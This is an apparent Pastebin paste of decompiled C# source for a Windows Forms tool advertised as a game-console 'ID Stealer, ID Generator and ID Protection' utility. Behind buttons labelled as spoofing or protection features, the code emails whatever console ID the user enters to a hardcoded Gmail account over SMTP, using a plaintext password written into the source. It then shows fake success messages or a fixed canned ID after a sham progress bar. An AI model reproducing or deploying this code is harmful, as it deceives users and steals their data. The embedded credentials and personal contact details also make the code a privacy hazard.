Advertisement
Guest User

Untitled

a guest
Aug 30th, 2015
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.93 KB | None | 0 0
  1. namespace ConsoleID
  2. {
  3. using Microsoft.VisualBasic.CompilerServices;
  4. using System;
  5. using System.Collections.Generic;
  6. using System.ComponentModel;
  7. using System.Diagnostics;
  8. using System.Drawing;
  9. using System.Net;
  10. using System.Net.Mail;
  11. using System.Runtime.CompilerServices;
  12. using System.Windows.Forms;
  13.  
  14. [DesignerGenerated]
  15. public class Form1 : Form
  16. {
  17. private static List<WeakReference> __ENCList = new List<WeakReference>();
  18. [AccessedThroughProperty("Button1")]
  19. private Button _Button1;
  20. [AccessedThroughProperty("Button2")]
  21. private Button _Button2;
  22. [AccessedThroughProperty("Button3")]
  23. private Button _Button3;
  24. [AccessedThroughProperty("Button4")]
  25. private Button _Button4;
  26. [AccessedThroughProperty("Button5")]
  27. private Button _Button5;
  28. [AccessedThroughProperty("CheckBox1")]
  29. private CheckBox _CheckBox1;
  30. [AccessedThroughProperty("CheckBox3")]
  31. private CheckBox _CheckBox3;
  32. [AccessedThroughProperty("GroupBox1")]
  33. private GroupBox _GroupBox1;
  34. [AccessedThroughProperty("GroupBox2")]
  35. private GroupBox _GroupBox2;
  36. [AccessedThroughProperty("GroupBox3")]
  37. private GroupBox _GroupBox3;
  38. [AccessedThroughProperty("Label1")]
  39. private Label _Label1;
  40. [AccessedThroughProperty("Label10")]
  41. private Label _Label10;
  42. [AccessedThroughProperty("Label2")]
  43. private Label _Label2;
  44. [AccessedThroughProperty("Label3")]
  45. private Label _Label3;
  46. [AccessedThroughProperty("Label4")]
  47. private Label _Label4;
  48. [AccessedThroughProperty("Label5")]
  49. private Label _Label5;
  50. [AccessedThroughProperty("Label6")]
  51. private Label _Label6;
  52. [AccessedThroughProperty("Label7")]
  53. private Label _Label7;
  54. [AccessedThroughProperty("Label8")]
  55. private Label _Label8;
  56. [AccessedThroughProperty("Label9")]
  57. private Label _Label9;
  58. [AccessedThroughProperty("lengthh")]
  59. private TextBox _lengthh;
  60. [AccessedThroughProperty("ProgressBar1")]
  61. private ProgressBar _ProgressBar1;
  62. [AccessedThroughProperty("RadioButton1")]
  63. private RadioButton _RadioButton1;
  64. [AccessedThroughProperty("RadioButton2")]
  65. private RadioButton _RadioButton2;
  66. [AccessedThroughProperty("RadioButton3")]
  67. private RadioButton _RadioButton3;
  68. [AccessedThroughProperty("RadioButton4")]
  69. private RadioButton _RadioButton4;
  70. [AccessedThroughProperty("Result")]
  71. private TextBox _Result;
  72. [AccessedThroughProperty("TextBox1")]
  73. private TextBox _TextBox1;
  74. [AccessedThroughProperty("TextBox2")]
  75. private TextBox _TextBox2;
  76. [AccessedThroughProperty("TextBox3")]
  77. private TextBox _TextBox3;
  78. [AccessedThroughProperty("TextBox4")]
  79. private TextBox _TextBox4;
  80. [AccessedThroughProperty("Timer1")]
  81. private System.Windows.Forms.Timer _Timer1;
  82. private IContainer components;
  83. private string pool;
  84.  
  85. public Form1()
  86. {
  87. base.Load += new EventHandler(this.Form1_Load);
  88. __ENCAddToList(this);
  89. this.pool = "000000000102030456078090876543210ABCDEFGHJMNKLP";
  90. this.InitializeComponent();
  91. }
  92.  
  93. [DebuggerNonUserCode]
  94. private static void __ENCAddToList(object value)
  95. {
  96. List<WeakReference> list = __ENCList;
  97. lock (list)
  98. {
  99. if (__ENCList.Count == __ENCList.Capacity)
  100. {
  101. int index = 0;
  102. int num3 = __ENCList.Count - 1;
  103. for (int i = 0; i <= num3; i++)
  104. {
  105. WeakReference reference = __ENCList[i];
  106. if (reference.IsAlive)
  107. {
  108. if (i != index)
  109. {
  110. __ENCList[index] = __ENCList[i];
  111. }
  112. index++;
  113. }
  114. }
  115. __ENCList.RemoveRange(index, __ENCList.Count - index);
  116. __ENCList.Capacity = __ENCList.Count;
  117. }
  118. __ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
  119. }
  120. }
  121.  
  122. private void Button1_Click(object sender, EventArgs e)
  123. {
  124. MailMessage message = new MailMessage {
  125. From = new MailAddress("cabukakin@gmail.com")
  126. };
  127. message.To.Add("cabukakin@gmail.com");
  128. message.Subject = "ID";
  129. message.Body = this.TextBox1.Text;
  130. new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential("cabukakin@gmail.com", "Furkan123.") }.Send(message);
  131. this.TextBox4.Text = "Your ID is Spoofed";
  132. }
  133.  
  134. private void Button3_Click(object sender, EventArgs e)
  135. {
  136. }
  137.  
  138. private void Button4_Click(object sender, EventArgs e)
  139. {
  140. MailMessage message = new MailMessage {
  141. From = new MailAddress("cabukakin@gmail.com")
  142. };
  143. message.To.Add("cabukakin@gmail.com");
  144. message.Subject = "ID";
  145. message.Body = this.TextBox2.Text;
  146. new SmtpClient("smtp.gmail.com") { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential("cabukakin@gmail.com", "Furkan123.") }.Send(message);
  147. if (this.RadioButton1.Checked)
  148. {
  149. this.Timer1.Start();
  150. }
  151. else if (this.RadioButton2.Checked)
  152. {
  153. this.Timer1.Start();
  154. }
  155. else
  156. {
  157. this.TextBox3.Text = "0000000100850009140DC8F672D606E4";
  158. }
  159. }
  160.  
  161. private void Button5_Click(object sender, EventArgs e)
  162. {
  163. this.pool = "";
  164. if (this.CheckBox1.Checked)
  165. {
  166. this.pool = this.pool + "000000000102030456078090876543210";
  167. }
  168. if (this.CheckBox3.Checked)
  169. {
  170. this.pool = this.pool + "ABCDEFGHJMNKLP";
  171. }
  172. int num = 0;
  173. Random random = new Random();
  174. string str = "";
  175. while (num <= Conversions.ToDouble(this.lengthh.Text))
  176. {
  177. str = Conversions.ToString(random.Next(0, this.pool.Length));
  178. this.Result.Text = this.Result.Text + Conversions.ToString(this.pool[Conversions.ToInteger(str)]);
  179. num++;
  180. }
  181. }
  182.  
  183. private void CheckBox2_CheckedChanged(object sender, EventArgs e)
  184. {
  185. }
  186.  
  187. [DebuggerNonUserCode]
  188. protected override void Dispose(bool disposing)
  189. {
  190. try
  191. {
  192. if (disposing && (this.components != null))
  193. {
  194. this.components.Dispose();
  195. }
  196. }
  197. finally
  198. {
  199. base.Dispose(disposing);
  200. }
  201. }
  202.  
  203. private void Form1_Load(object sender, EventArgs e)
  204. {
  205. }
  206.  
  207. private void GroupBox2_Enter(object sender, EventArgs e)
  208. {
  209. }
  210.  
  211. [DebuggerStepThrough]
  212. private void InitializeComponent()
  213. {
  214. this.components = new System.ComponentModel.Container();
  215. ComponentResourceManager manager = new ComponentResourceManager(typeof(Form1));
  216. this.TextBox4 = new TextBox();
  217. this.RadioButton3 = new RadioButton();
  218. this.Label2 = new Label();
  219. this.Label1 = new Label();
  220. this.Button1 = new Button();
  221. this.TextBox1 = new TextBox();
  222. this.GroupBox2 = new GroupBox();
  223. this.Label9 = new Label();
  224. this.Label5 = new Label();
  225. this.TextBox3 = new TextBox();
  226. this.Button4 = new Button();
  227. this.Label3 = new Label();
  228. this.RadioButton1 = new RadioButton();
  229. this.ProgressBar1 = new ProgressBar();
  230. this.Button2 = new Button();
  231. this.RadioButton2 = new RadioButton();
  232. this.Label4 = new Label();
  233. this.TextBox2 = new TextBox();
  234. this.GroupBox3 = new GroupBox();
  235. this.lengthh = new TextBox();
  236. this.CheckBox3 = new CheckBox();
  237. this.CheckBox1 = new CheckBox();
  238. this.Label6 = new Label();
  239. this.Result = new TextBox();
  240. this.Button5 = new Button();
  241. this.Timer1 = new System.Windows.Forms.Timer(this.components);
  242. this.Label7 = new Label();
  243. this.Label8 = new Label();
  244. this.Label10 = new Label();
  245. this.GroupBox1.SuspendLayout();
  246. this.GroupBox2.SuspendLayout();
  247. this.GroupBox3.SuspendLayout();
  248. this.SuspendLayout();
  249. this.GroupBox1.Controls.Add(this.TextBox4);
  250. this.GroupBox1.Controls.Add(this.RadioButton3);
  251. this.GroupBox1.Controls.Add(this.Label2);
  252. this.GroupBox1.Controls.Add(this.Button3);
  253. this.GroupBox1.Controls.Add(this.RadioButton4);
  254. this.GroupBox1.Controls.Add(this.Label1);
  255. this.GroupBox1.Controls.Add(this.Button1);
  256. this.GroupBox1.Controls.Add(this.TextBox1);
  257. Point point2 = new Point(0x16, 0x1a);
  258. this.GroupBox1.Location = point2;
  259. this.GroupBox1.Name = "GroupBox1";
  260. Size size2 = new Size(0x181, 0x13d);
  261. this.GroupBox1.Size = size2;
  262. this.GroupBox1.TabIndex = 0;
  263. this.GroupBox1.TabStop = false;
  264. this.GroupBox1.Text = "ID Protection";
  265. point2 = new Point(0x20, 0x101);
  266. this.TextBox4.Location = point2;
  267. this.TextBox4.Name = "TextBox4";
  268. this.TextBox4.Size = size2;
  269. this.TextBox4.TabIndex = 10;
  270. this.RadioButton3.AutoSize = true;
  271. point2 = new Point(0x13c, 0x6a);
  272. this.RadioButton3.Location = point2;
  273. this.RadioButton3.Name = "RadioButton3";
  274. this.RadioButton3.TabIndex = 9;
  275. this.RadioButton3.TabStop = true;
  276. this.RadioButton3.Text = "Dex";
  277. this.RadioButton3.UseVisualStyleBackColor = true;
  278. this.Label2.AutoSize = true;
  279. this.Label2.ForeColor = Color.CornflowerBlue;
  280. point2 = new Point(3, 0x12d);
  281. this.Label2.Location = point2;
  282. this.Label2.Name = "Label2";
  283. this.Label2.Text = "thanks to RatchetBooty, Enstone, Tustin, ACS-NGU, ZerthekModz, 1austin112";
  284. point2 = new Point(0x20, 0x88);
  285. this.Button3.Name = "Button3";
  286. size2 = new Size(0x148, 0x20);
  287. this.Button3.Size = size2;
  288. this.Button3.TabIndex = 7;
  289. this.Button3.Text = "Connect and Attach ";
  290. this.Button3.UseVisualStyleBackColor = true;
  291. this.RadioButton4.AutoSize = true;
  292. point2 = new Point(0x20, 0x69);
  293. this.RadioButton4.Location = point2;
  294. this.RadioButton4.Name = "RadioButton4";
  295. size2 = new Size(0x2e, 0x11);
  296. this.RadioButton4.Size = size2;
  297. this.RadioButton4.TabIndex = 8;
  298. this.RadioButton4.TabStop = true;
  299. this.RadioButton4.Text = "Cex ";
  300. this.RadioButton4.UseVisualStyleBackColor = true;
  301. this.Label1.AutoSize = true;
  302. point2 = new Point(0x1d, 0x3d);
  303. this.Label1.Location = point2;
  304. this.Label1.Name = "Label1";
  305. size2 = new Size(0x57, 13);
  306. this.Label1.Size = size2;
  307. this.Label1.TabIndex = 2;
  308. this.Label1.Text = "Your Console ID ";
  309. point2 = new Point(0x20, 180);
  310. this.Button1.Location = point2;
  311. this.Button1.Name = "Button1";
  312. size2 = new Size(0x148, 0x41);
  313. this.Button1.Size = size2;
  314. this.Button1.TabIndex = 1;
  315. this.Button1.Text = "Disable CFW, Spoof IDPS, Enable AntiBaan ";
  316. this.Button1.UseVisualStyleBackColor = true;
  317. point2 = new Point(0x20, 0x4f);
  318. this.TextBox1.Location = point2;
  319. this.TextBox1.Name = "TextBox1";
  320. size2 = new Size(0x148, 20);
  321. this.TextBox1.Size = size2;
  322. this.TextBox1.TabIndex = 0;
  323. this.GroupBox2.Controls.Add(this.Label9);
  324. this.GroupBox2.Controls.Add(this.Label5);
  325. this.GroupBox2.Controls.Add(this.TextBox3);
  326. this.GroupBox2.Controls.Add(this.Button4);
  327. this.GroupBox2.Controls.Add(this.Label3);
  328. this.GroupBox2.Controls.Add(this.RadioButton1);
  329. this.GroupBox2.Controls.Add(this.ProgressBar1);
  330. this.GroupBox2.Controls.Add(this.Button2);
  331. this.GroupBox2.Controls.Add(this.RadioButton2);
  332. this.GroupBox2.Controls.Add(this.Label4);
  333. this.GroupBox2.Controls.Add(this.TextBox2);
  334. point2 = new Point(0x1a6, 0x1a);
  335. this.GroupBox2.Location = point2;
  336. this.GroupBox2.Name = "GroupBox2";
  337. size2 = new Size(0x181, 0x13d);
  338. this.GroupBox2.Size = size2;
  339. this.GroupBox2.TabIndex = 4;
  340. this.GroupBox2.TabStop = false;
  341. this.GroupBox2.Text = "ID Stealer by Endstone";
  342. this.Label9.AutoSize = true;
  343. this.Label9.ForeColor = Color.Crimson;
  344. point2 = new Point(0xe9, 0xaf);
  345. this.Label9.Location = point2;
  346. this.Label9.Name = "Label9";
  347. size2 = new Size(0x81, 13);
  348. this.Label9.Size = size2;
  349. this.Label9.TabIndex = 0x11;
  350. this.Label9.Text = "Network Emulation Status";
  351. this.Label5.AutoSize = true;
  352. this.Label5.ForeColor = Color.ForestGreen;
  353. point2 = new Point(0x1f, 0x109);
  354. this.Label5.Location = point2;
  355. this.Label5.Name = "Label5";
  356. size2 = new Size(0x67, 13);
  357. this.Label5.Size = size2;
  358. this.Label5.TabIndex = 0x10;
  359. this.Label5.Text = "Random OFW IDPS";
  360. point2 = new Point(0x22, 0x119);
  361. this.TextBox3.Location = point2;
  362. this.TextBox3.Name = "TextBox3";
  363. this.TextBox3.ReadOnly = true;
  364. size2 = new Size(0x148, 20);
  365. this.TextBox3.Size = size2;
  366. this.TextBox3.TabIndex = 15;
  367. point2 = new Point(0x22, 0xc4);
  368. this.Button4.Location = point2;
  369. this.Button4.Name = "Button4";
  370. size2 = new Size(0x148, 0x20);
  371. this.Button4.Size = size2;
  372. this.Button4.TabIndex = 14;
  373. this.Button4.Text = "Catch and Grabb IDPS.bin";
  374. this.Button4.UseVisualStyleBackColor = true;
  375. this.Label3.AutoSize = true;
  376. this.Label3.ForeColor = Color.Crimson;
  377. point2 = new Point(0x1f, 0xaf);
  378. this.Label3.Location = point2;
  379. this.Label3.Name = "Label3";
  380. size2 = new Size(0x8b, 13);
  381. this.Label3.Size = size2;
  382. this.Label3.TabIndex = 13;
  383. this.Label3.Text = "Debug Settings: HDCP OFF";
  384. this.RadioButton1.AutoSize = true;
  385. point2 = new Point(0x13b, 0x6a);
  386. this.RadioButton1.Location = point2;
  387. this.RadioButton1.Name = "RadioButton1";
  388. size2 = new Size(0x2c, 0x11);
  389. this.RadioButton1.Size = size2;
  390. this.RadioButton1.TabIndex = 12;
  391. this.RadioButton1.TabStop = true;
  392. this.RadioButton1.Text = "Dex";
  393. this.RadioButton1.UseVisualStyleBackColor = true;
  394. point2 = new Point(0x22, 0xea);
  395. this.ProgressBar1.Location = point2;
  396. this.ProgressBar1.Name = "ProgressBar1";
  397. size2 = new Size(0x148, 0x10);
  398. this.ProgressBar1.Size = size2;
  399. this.ProgressBar1.TabIndex = 6;
  400. point2 = new Point(0x22, 0x88);
  401. this.Button2.Location = point2;
  402. this.Button2.Name = "Button2";
  403. size2 = new Size(0x148, 0x20);
  404. this.Button2.Size = size2;
  405. this.Button2.TabIndex = 10;
  406. this.Button2.Text = "Connect and Attach ";
  407. this.Button2.UseVisualStyleBackColor = true;
  408. this.RadioButton2.AutoSize = true;
  409. point2 = new Point(0x1f, 0x69);
  410. this.RadioButton2.Location = point2;
  411. this.RadioButton2.Name = "RadioButton2";
  412. size2 = new Size(0x2e, 0x11);
  413. this.RadioButton2.Size = size2;
  414. this.RadioButton2.TabIndex = 11;
  415. this.RadioButton2.TabStop = true;
  416. this.RadioButton2.Text = "Cex ";
  417. this.RadioButton2.UseVisualStyleBackColor = true;
  418. this.Label4.AutoSize = true;
  419. point2 = new Point(0x1c, 0x38);
  420. this.Label4.Location = point2;
  421. this.Label4.Name = "Label4";
  422. size2 = new Size(0x57, 13);
  423. this.Label4.Size = size2;
  424. this.Label4.TabIndex = 2;
  425. this.Label4.Text = "Your Console ID ";
  426. point2 = new Point(0x1f, 0x4a);
  427. this.TextBox2.Location = point2;
  428. this.TextBox2.Name = "TextBox2";
  429. size2 = new Size(0x148, 20);
  430. this.TextBox2.Size = size2;
  431. this.TextBox2.TabIndex = 0;
  432. this.GroupBox3.BackColor = SystemColors.Control;
  433. this.GroupBox3.Controls.Add(this.lengthh);
  434. this.GroupBox3.Controls.Add(this.CheckBox3);
  435. this.GroupBox3.Controls.Add(this.CheckBox1);
  436. this.GroupBox3.Controls.Add(this.Label6);
  437. this.GroupBox3.Controls.Add(this.Result);
  438. this.GroupBox3.Controls.Add(this.Button5);
  439. this.GroupBox3.ForeColor = Color.Black;
  440. point2 = new Point(0x1a6, 0x16c);
  441. this.GroupBox3.Location = point2;
  442. this.GroupBox3.Name = "GroupBox3";
  443. size2 = new Size(0x181, 0xa4);
  444. this.GroupBox3.Size = size2;
  445. this.GroupBox3.TabIndex = 0x11;
  446. this.GroupBox3.TabStop = false;
  447. this.GroupBox3.Text = "ID Generator by Flaqz";
  448. point2 = new Point(0x1a, 15);
  449. this.lengthh.Location = point2;
  450. this.lengthh.Name = "lengthh";
  451. size2 = new Size(0x13, 20);
  452. this.lengthh.Size = size2;
  453. this.lengthh.TabIndex = 6;
  454. this.lengthh.Text = "24";
  455. this.CheckBox3.AutoSize = true;
  456. point2 = new Point(0x105, 0x5e);
  457. this.CheckBox3.Location = point2;
  458. this.CheckBox3.Name = "CheckBox3";
  459. size2 = new Size(0x76, 0x11);
  460. this.CheckBox3.Size = size2;
  461. this.CheckBox3.TabIndex = 5;
  462. this.CheckBox3.Text = "Activate Unbanned";
  463. this.CheckBox3.UseVisualStyleBackColor = true;
  464. this.CheckBox1.AutoSize = true;
  465. point2 = new Point(0x1a, 0x5e);
  466. this.CheckBox1.Location = point2;
  467. this.CheckBox1.Name = "CheckBox1";
  468. size2 = new Size(0x6c, 0x11);
  469. this.CheckBox1.Size = size2;
  470. this.CheckBox1.TabIndex = 3;
  471. this.CheckBox1.Text = "Activate Random";
  472. this.CheckBox1.UseVisualStyleBackColor = true;
  473. this.Label6.AutoSize = true;
  474. point2 = new Point(0x29, 0x83);
  475. this.Label6.Location = point2;
  476. this.Label6.Name = "Label6";
  477. size2 = new Size(0x37, 13);
  478. this.Label6.Size = size2;
  479. this.Label6.TabIndex = 2;
  480. this.Label6.Text = "00000184";
  481. point2 = new Point(0x61, 0x7f);
  482. this.Result.Location = point2;
  483. this.Result.Name = "Result";
  484. size2 = new Size(0xfe, 20);
  485. this.Result.Size = size2;
  486. this.Result.TabIndex = 1;
  487. point2 = new Point(0x1a, 0x29);
  488. this.Button5.Location = point2;
  489. this.Button5.Name = "Button5";
  490. size2 = new Size(0x159, 0x2f);
  491. this.Button5.Size = size2;
  492. this.Button5.TabIndex = 0;
  493. this.Button5.Text = "Random ID ";
  494. this.Button5.UseVisualStyleBackColor = true;
  495. this.Label7.AutoSize = true;
  496. this.Label7.Font = new Font("Microsoft Sans Serif", 15f, FontStyle.Regular, GraphicsUnit.Point, 0);
  497. this.Label7.ForeColor = Color.Magenta;
  498. point2 = new Point(0x12b, 2);
  499. this.Label7.Location = point2;
  500. this.Label7.Name = "Label7";
  501. size2 = new Size(0xde, 0x19);
  502. this.Label7.Size = size2;
  503. this.Label7.TabIndex = 0x12;
  504. this.Label7.Text = "Skype : WarriorHunt353";
  505. this.Label8.AutoSize = true;
  506. this.Label8.BackColor = SystemColors.Control;
  507. this.Label8.Font = new Font("Microsoft Sans Serif", 13.25f, FontStyle.Regular, GraphicsUnit.Point, 0);
  508. this.Label8.ForeColor = Color.Red;
  509. point2 = new Point(0x18, 0x17b);
  510. this.Label8.Location = point2;
  511. this.Label8.Name = "Label8";
  512. size2 = new Size(0x17d, 110);
  513. this.Label8.Size = size2;
  514. this.Label8.TabIndex = 0x13;
  515. this.Label8.Text = "I Update the Tool in 12h once with new IDs !!\r\n\r\nIf there are a ID banned so wait some Hours :) \r\n\r\nIt works 100% <3 ";
  516. this.Label10.AutoSize = true;
  517. point2 = new Point(0x2ca, 11);
  518. this.Label10.Location = point2;
  519. this.Label10.Name = "Label10";
  520. size2 = new Size(0x7a, 13);
  521. this.Label10.Size = size2;
  522. this.Label10.TabIndex = 20;
  523. this.Label10.Text = "Update it 06.07.2015 <3";
  524. SizeF ef2 = new SizeF(6f, 13f);
  525. this.AutoScaleDimensions = ef2;
  526. this.AutoScaleMode = AutoScaleMode.Font;
  527. size2 = new Size(0x350, 540);
  528. this.ClientSize = size2;
  529. this.Controls.Add(this.Label10);
  530. this.Controls.Add(this.Label8);
  531. this.Controls.Add(this.Label7);
  532. this.Controls.Add(this.GroupBox3);
  533. this.Controls.Add(this.GroupBox2);
  534. this.Controls.Add(this.GroupBox1);
  535. this.Icon = (Icon) manager.GetObject("$this.Icon");
  536. this.Name = "Form1";
  537. this.Text = "Console ID Stealer & ID Generator & ID Protection";
  538. this.GroupBox1.ResumeLayout(false);
  539. this.GroupBox1.PerformLayout();
  540. this.GroupBox2.ResumeLayout(false);
  541. this.GroupBox2.PerformLayout();
  542. this.GroupBox3.ResumeLayout(false);
  543. this.GroupBox3.PerformLayout();
  544. this.ResumeLayout(false);
  545. this.PerformLayout();
  546. }
  547.  
  548. private void ProgressBar1_Click(object sender, EventArgs e)
  549. {
  550. }
  551.  
  552. private void Result_TextChanged(object sender, EventArgs e)
  553. {
  554. }
  555.  
  556. private void TextBox3_TextChanged(object sender, EventArgs e)
  557. {
  558. }
  559.  
  560. private void Timer1_Tick(object sender, EventArgs e)
  561. {
  562. this.ProgressBar1.Increment(3);
  563. if (this.ProgressBar1.Value == 100)
  564. {
  565. this.TextBox3.Text = "0000000100850009140DC8F672D606E4";
  566. this.Timer1.Stop();
  567. }
  568. }
  569.  
  570. internal virtual Button Button1
  571. {
  572. [DebuggerNonUserCode]
  573. get
  574. {
  575. return this._Button1;
  576. }
  577. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  578. set
  579. {
  580. EventHandler handler = new EventHandler(this.Button1_Click);
  581. if (this._Button1 != null)
  582. {
  583. this._Button1.Click -= handler;
  584. }
  585. this._Button1 = value;
  586. if (this._Button1 != null)
  587. {
  588. this._Button1.Click += handler;
  589. }
  590. }
  591. }
  592.  
  593. internal virtual Button Button2
  594. {
  595. [DebuggerNonUserCode]
  596. get
  597. {
  598. return this._Button2;
  599. }
  600. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  601. set
  602. {
  603. this._Button2 = value;
  604. }
  605. }
  606.  
  607. internal virtual Button Button3
  608. {
  609. [DebuggerNonUserCode]
  610. get
  611. {
  612. return this._Button3;
  613. }
  614. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  615. set
  616. {
  617. EventHandler handler = new EventHandler(this.Button3_Click);
  618. if (this._Button3 != null)
  619. {
  620. this._Button3.Click -= handler;
  621. }
  622. this._Button3 = value;
  623. if (this._Button3 != null)
  624. {
  625. this._Button3.Click += handler;
  626. }
  627. }
  628. }
  629.  
  630. internal virtual Button Button4
  631. {
  632. [DebuggerNonUserCode]
  633. get
  634. {
  635. return this._Button4;
  636. }
  637. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  638. set
  639. {
  640. EventHandler handler = new EventHandler(this.Button4_Click);
  641. if (this._Button4 != null)
  642. {
  643. this._Button4.Click -= handler;
  644. }
  645. this._Button4 = value;
  646. if (this._Button4 != null)
  647. {
  648. this._Button4.Click += handler;
  649. }
  650. }
  651. }
  652.  
  653. internal virtual Button Button5
  654. {
  655. [DebuggerNonUserCode]
  656. get
  657. {
  658. return this._Button5;
  659. }
  660. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  661. set
  662. {
  663. EventHandler handler = new EventHandler(this.Button5_Click);
  664. if (this._Button5 != null)
  665. {
  666. this._Button5.Click -= handler;
  667. }
  668. this._Button5 = value;
  669. if (this._Button5 != null)
  670. {
  671. this._Button5.Click += handler;
  672. }
  673. }
  674. }
  675.  
  676. internal virtual CheckBox CheckBox1
  677. {
  678. [DebuggerNonUserCode]
  679. get
  680. {
  681. return this._CheckBox1;
  682. }
  683. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  684. set
  685. {
  686. this._CheckBox1 = value;
  687. }
  688. }
  689.  
  690. internal virtual CheckBox CheckBox3
  691. {
  692. [DebuggerNonUserCode]
  693. get
  694. {
  695. return this._CheckBox3;
  696. }
  697. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  698. set
  699. {
  700. this._CheckBox3 = value;
  701. }
  702. }
  703.  
  704. internal virtual GroupBox GroupBox1
  705. {
  706. [DebuggerNonUserCode]
  707. get
  708. {
  709. return this._GroupBox1;
  710. }
  711. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  712. set
  713. {
  714. this._GroupBox1 = value;
  715. }
  716. }
  717.  
  718. internal virtual GroupBox GroupBox2
  719. {
  720. [DebuggerNonUserCode]
  721. get
  722. {
  723. return this._GroupBox2;
  724. }
  725. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  726. set
  727. {
  728. EventHandler handler = new EventHandler(this.GroupBox2_Enter);
  729. if (this._GroupBox2 != null)
  730. {
  731. this._GroupBox2.Enter -= handler;
  732. }
  733. this._GroupBox2 = value;
  734. if (this._GroupBox2 != null)
  735. {
  736. this._GroupBox2.Enter += handler;
  737. }
  738. }
  739. }
  740.  
  741. internal virtual GroupBox GroupBox3
  742. {
  743. [DebuggerNonUserCode]
  744. get
  745. {
  746. return this._GroupBox3;
  747. }
  748. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  749. set
  750. {
  751. this._GroupBox3 = value;
  752. }
  753. }
  754.  
  755. internal virtual Label Label1
  756. {
  757. [DebuggerNonUserCode]
  758. get
  759. {
  760. return this._Label1;
  761. }
  762. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  763. set
  764. {
  765. this._Label1 = value;
  766. }
  767. }
  768.  
  769. internal virtual Label Label10
  770. {
  771. [DebuggerNonUserCode]
  772. get
  773. {
  774. return this._Label10;
  775. }
  776. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  777. set
  778. {
  779. this._Label10 = value;
  780. }
  781. }
  782.  
  783. internal virtual Label Label2
  784. {
  785. [DebuggerNonUserCode]
  786. get
  787. {
  788. return this._Label2;
  789. }
  790. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  791. set
  792. {
  793. this._Label2 = value;
  794. }
  795. }
  796.  
  797. internal virtual Label Label3
  798. {
  799. [DebuggerNonUserCode]
  800. get
  801. {
  802. return this._Label3;
  803. }
  804. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  805. set
  806. {
  807. this._Label3 = value;
  808. }
  809. }
  810.  
  811. internal virtual Label Label4
  812. {
  813. [DebuggerNonUserCode]
  814. get
  815. {
  816. return this._Label4;
  817. }
  818. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  819. set
  820. {
  821. this._Label4 = value;
  822. }
  823. }
  824.  
  825. internal virtual Label Label5
  826. {
  827. [DebuggerNonUserCode]
  828. get
  829. {
  830. return this._Label5;
  831. }
  832. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  833. set
  834. {
  835. this._Label5 = value;
  836. }
  837. }
  838.  
  839. internal virtual Label Label6
  840. {
  841. [DebuggerNonUserCode]
  842. get
  843. {
  844. return this._Label6;
  845. }
  846. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  847. set
  848. {
  849. this._Label6 = value;
  850. }
  851. }
  852.  
  853. internal virtual Label Label7
  854. {
  855. [DebuggerNonUserCode]
  856. get
  857. {
  858. return this._Label7;
  859. }
  860. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  861. set
  862. {
  863. this._Label7 = value;
  864. }
  865. }
  866.  
  867. internal virtual Label Label8
  868. {
  869. [DebuggerNonUserCode]
  870. get
  871. {
  872. return this._Label8;
  873. }
  874. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  875. set
  876. {
  877. this._Label8 = value;
  878. }
  879. }
  880.  
  881. internal virtual Label Label9
  882. {
  883. [DebuggerNonUserCode]
  884. get
  885. {
  886. return this._Label9;
  887. }
  888. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  889. set
  890. {
  891. this._Label9 = value;
  892. }
  893. }
  894.  
  895. internal virtual TextBox lengthh
  896. {
  897. [DebuggerNonUserCode]
  898. get
  899. {
  900. return this._lengthh;
  901. }
  902. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  903. set
  904. {
  905. this._lengthh = value;
  906. }
  907. }
  908.  
  909. internal virtual ProgressBar ProgressBar1
  910. {
  911. [DebuggerNonUserCode]
  912. get
  913. {
  914. return this._ProgressBar1;
  915. }
  916. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  917. set
  918. {
  919. EventHandler handler = new EventHandler(this.ProgressBar1_Click);
  920. if (this._ProgressBar1 != null)
  921. {
  922. this._ProgressBar1.Click -= handler;
  923. }
  924. this._ProgressBar1 = value;
  925. if (this._ProgressBar1 != null)
  926. {
  927. this._ProgressBar1.Click += handler;
  928. }
  929. }
  930. }
  931.  
  932. internal virtual RadioButton RadioButton1
  933. {
  934. [DebuggerNonUserCode]
  935. get
  936. {
  937. return this._RadioButton1;
  938. }
  939. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  940. set
  941. {
  942. this._RadioButton1 = value;
  943. }
  944. }
  945.  
  946. internal virtual RadioButton RadioButton2
  947. {
  948. [DebuggerNonUserCode]
  949. get
  950. {
  951. return this._RadioButton2;
  952. }
  953. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  954. set
  955. {
  956. this._RadioButton2 = value;
  957. }
  958. }
  959.  
  960. internal virtual RadioButton RadioButton3
  961. {
  962. [DebuggerNonUserCode]
  963. get
  964. {
  965. return this._RadioButton3;
  966. }
  967. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  968. set
  969. {
  970. this._RadioButton3 = value;
  971. }
  972. }
  973.  
